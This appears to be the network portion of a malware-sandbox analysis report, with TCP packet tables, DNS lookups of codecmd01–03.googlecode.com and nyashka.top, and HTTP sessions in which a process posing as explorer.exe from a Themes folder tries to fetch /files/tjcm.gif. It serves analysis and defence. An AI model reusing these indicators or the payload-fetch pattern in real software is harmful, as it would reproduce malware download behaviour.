                                                                                                                                                          Jan 13, 2025 13:18:22.608887911 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:23.030025959 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:23.035063982 CET805669164.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:23.035177946 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:23.035602093 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:23.040471077 CET805669164.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:23.740910053 CET805669164.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:23.740982056 CET805669164.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:23.741000891 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:23.741034031 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:23.743196011 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:23.743446112 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:23.748173952 CET805669164.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:23.748228073 CET5669180192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:24.443052053 CET5670180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:24.447890997 CET805670166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:24.447971106 CET5670180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:24.451474905 CET5670180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:24.456417084 CET805670166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:25.161976099 CET805670166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:25.161994934 CET805670166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:25.162055969 CET5670180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:25.162111044 CET5670180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:25.165580034 CET5670180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:25.165602922 CET5670180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:25.591778994 CET5670880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:25.596705914 CET805670874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:25.596771955 CET5670880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:25.613358021 CET5670880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:25.618204117 CET805670874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:26.302078962 CET805670874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:26.302108049 CET805670874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:26.302205086 CET5670880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:26.302731037 CET5670880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:26.302762985 CET5670880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:27.078826904 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:27.083884001 CET805671564.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:27.083956957 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:27.090284109 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:27.095597029 CET805671564.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:27.836442947 CET805671564.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:27.836496115 CET805671564.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:27.836514950 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:27.836563110 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:27.844444990 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:27.844841003 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:27.849493027 CET805671564.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:27.849558115 CET5671580192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:28.312304974 CET5672580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:28.317249060 CET805672566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:28.317398071 CET5672580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:28.317826986 CET5672580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:28.322613955 CET805672566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:29.043484926 CET805672566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:29.043515921 CET805672566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:29.044003963 CET5672580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:29.044081926 CET5672580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:29.044081926 CET5672580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:29.722820044 CET5673180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:29.727838039 CET805673174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:29.727893114 CET5673180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:29.728908062 CET5673180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:29.733705044 CET805673174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:30.465274096 CET805673174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:30.465357065 CET5673180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:30.465377092 CET805673174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:30.465415955 CET5673180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:30.465816975 CET5673180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:30.465837002 CET5673180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:30.854171038 CET5674280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:30.859098911 CET805674264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:30.859241009 CET5674280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:30.860106945 CET5674280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:30.867419958 CET805674264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:31.583496094 CET805674264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:31.583539963 CET805674264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:31.583609104 CET5674280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:31.583609104 CET5674280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:31.584240913 CET5674280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:31.584240913 CET5674280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:31.987629890 CET5674880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:31.992525101 CET805674866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:31.992623091 CET5674880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:31.996359110 CET5674880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:32.001271963 CET805674866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:32.715470076 CET805674866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:32.715492964 CET805674866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:32.715538025 CET5674880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:32.715570927 CET5674880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:32.715837002 CET5674880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:32.715863943 CET5674880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:33.108918905 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:33.115995884 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:33.116174936 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:33.120348930 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:33.126844883 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:34.557426929 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:34.557492018 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:34.557506084 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:34.557508945 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:34.557538986 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:34.557554960 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:34.557703018 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:34.557746887 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:34.557894945 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:34.557939053 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:34.599813938 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:34.599844933 CET5675580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:34.697926044 CET805675574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:53.257493019 CET5685780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:53.262377024 CET805685764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:53.262465954 CET5685780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:53.266840935 CET5685780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:53.272392988 CET805685764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:53.986639023 CET805685764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:53.986659050 CET805685764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:53.986701012 CET5685780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:53.986732960 CET5685780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:53.988317966 CET5685780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:53.988343954 CET5685780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:54.342108965 CET5685880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:54.347167969 CET805685866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:54.347239017 CET5685880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:54.366554022 CET5685880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:54.371471882 CET805685866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:55.071510077 CET805685866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:55.071530104 CET805685866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:55.071605921 CET5685880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:55.073080063 CET5685880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:55.073189020 CET5685880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:55.339487076 CET5685980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:55.344608068 CET805685974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:55.344696045 CET5685980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:55.344947100 CET5685980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:55.349811077 CET805685974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:56.056495905 CET805685974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:56.056545019 CET805685974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:56.056603909 CET5685980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:56.056634903 CET5685980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:56.058542013 CET5685980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:56.058626890 CET5685980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:56.671257019 CET5686080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:56.676944971 CET805686064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:56.677047014 CET5686080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:56.679346085 CET5686080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:56.684205055 CET805686064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:57.383725882 CET805686064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:57.383753061 CET805686064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:57.383825064 CET5686080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:57.383868933 CET5686080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:57.384376049 CET5686080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:57.384411097 CET5686080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:57.723577976 CET5686180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:57.728486061 CET805686166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:57.728619099 CET5686180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:57.728806019 CET5686180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:57.733601093 CET805686166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:58.452804089 CET805686166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:58.452830076 CET805686166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:58.452894926 CET5686180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:58.452939034 CET5686180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:58.453547001 CET5686180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:58.453572989 CET5686180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:58.823667049 CET5686280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:58.828516960 CET805686274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:58.828597069 CET5686280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:58.828869104 CET5686280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:58.833620071 CET805686274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:59.562171936 CET805686274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:59.562197924 CET805686274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:59.562252998 CET5686280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:59.562304974 CET5686280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:59.566343069 CET5686280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:59.566375017 CET5686280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:59.863775015 CET5686380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:59.868659019 CET805686364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:59.868724108 CET5686380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:59.908731937 CET5686380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:18:59.913528919 CET805686364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:00.575400114 CET805686364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:00.575424910 CET805686364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:00.575472116 CET5686380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:00.575503111 CET5686380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:00.575823069 CET5686380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:00.575907946 CET5686380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:00.919838905 CET5686480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:00.927342892 CET805686466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:00.927453995 CET5686480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:00.927939892 CET5686480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:00.935302019 CET805686466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:01.652694941 CET805686466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:01.652767897 CET805686466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:01.652960062 CET5686480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:01.750200033 CET5686480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:01.750235081 CET5686480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:02.088807106 CET5686580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:02.094105005 CET805686574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:02.094198942 CET5686580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:02.094438076 CET5686580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:02.099246979 CET805686574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:02.919459105 CET805686574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:02.919480085 CET805686574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:02.919532061 CET5686580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:02.919563055 CET5686580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:02.919878006 CET5686580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:02.919903994 CET5686580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:03.228446007 CET5686680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:03.233375072 CET805686664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:03.233438015 CET5686680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:03.234020948 CET5686680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:03.238802910 CET805686664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:03.967974901 CET805686664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:03.967992067 CET805686664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:03.968286991 CET5686680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:03.997454882 CET5686680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:03.997695923 CET5686680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:04.638959885 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:04.643949986 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:04.644043922 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:04.645541906 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:04.650520086 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.383765936 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.383789062 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.383837938 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.383837938 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.388472080 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.388652086 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.744601965 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:05.749633074 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.749716043 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:05.749891996 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:05.754726887 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:06.474775076 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:06.475022078 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:06.475120068 CET5686880192.168.2.474.125.133.82
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 13, 2025 13:17:10.261105061 CET | 192.168.2.4 | 1.1.1.1 | 0xb992 | Standard query (0) | codecmd01.googlecode.com | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:17:12.445127964 CET | 192.168.2.4 | 1.1.1.1 | 0xc591 | Standard query (0) | codecmd02.googlecode.com | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:17:14.555270910 CET | 192.168.2.4 | 1.1.1.1 | 0x7976 | Standard query (0) | codecmd03.googlecode.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 13, 2025 13:17:10.268588066 CET | 1.1.1.1 | 192.168.2.4 | 0xb992 | No error (0) | codecmd01.googlecode.com | googlecode.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:17:10.268588066 CET | 1.1.1.1 | 192.168.2.4 | 0xb992 | No error (0) | googlecode.l.googleusercontent.com | | 66.102.1.82 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:17:12.453325987 CET | 1.1.1.1 | 192.168.2.4 | 0xc591 | No error (0) | codecmd02.googlecode.com | googlecode.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:17:12.453325987 CET | 1.1.1.1 | 192.168.2.4 | 0xc591 | No error (0) | googlecode.l.googleusercontent.com | | 74.125.133.82 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:17:14.604494095 CET | 1.1.1.1 | 192.168.2.4 | 0x7976 | No error (0) | codecmd03.googlecode.com | googlecode.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:17:14.604494095 CET | 1.1.1.1 | 192.168.2.4 | 0x7976 | No error (0) | googlecode.l.googleusercontent.com | | 64.233.167.82 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:17:33.929214954 CET | 1.1.1.1 | 192.168.2.4 | 0x9166 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:17:45.144247055 CET | 1.1.1.1 | 192.168.2.4 | 0x5fbe | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:18:02.199925900 CET | 1.1.1.1 | 192.168.2.4 | 0xe7b9 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:18:09.671674967 CET | 1.1.1.1 | 192.168.2.4 | 0xabc7 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:18:15.478084087 CET | 1.1.1.1 | 192.168.2.4 | 0x1 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:18:35.733280897 CET | 1.1.1.1 | 192.168.2.4 | 0x6420 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:18:43.484617949 CET | 1.1.1.1 | 192.168.2.4 | 0xb554 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:18:53.295874119 CET | 1.1.1.1 | 192.168.2.4 | 0x3418 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:19:02.132957935 CET | 1.1.1.1 | 192.168.2.4 | 0x2b1a | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:19:08.960175037 CET | 1.1.1.1 | 192.168.2.4 | 0x3926 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                          • codecmd01.googlecode.com
                                                                                                                                                          • codecmd02.googlecode.com
                                                                                                                                                          • codecmd03.googlecode.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:10.278882027 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:11.031574011 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:10 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:17:11.031611919 CET | 494 | IN |
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:17:12.459279060 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:17:13.192857981 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:17:13 GMT
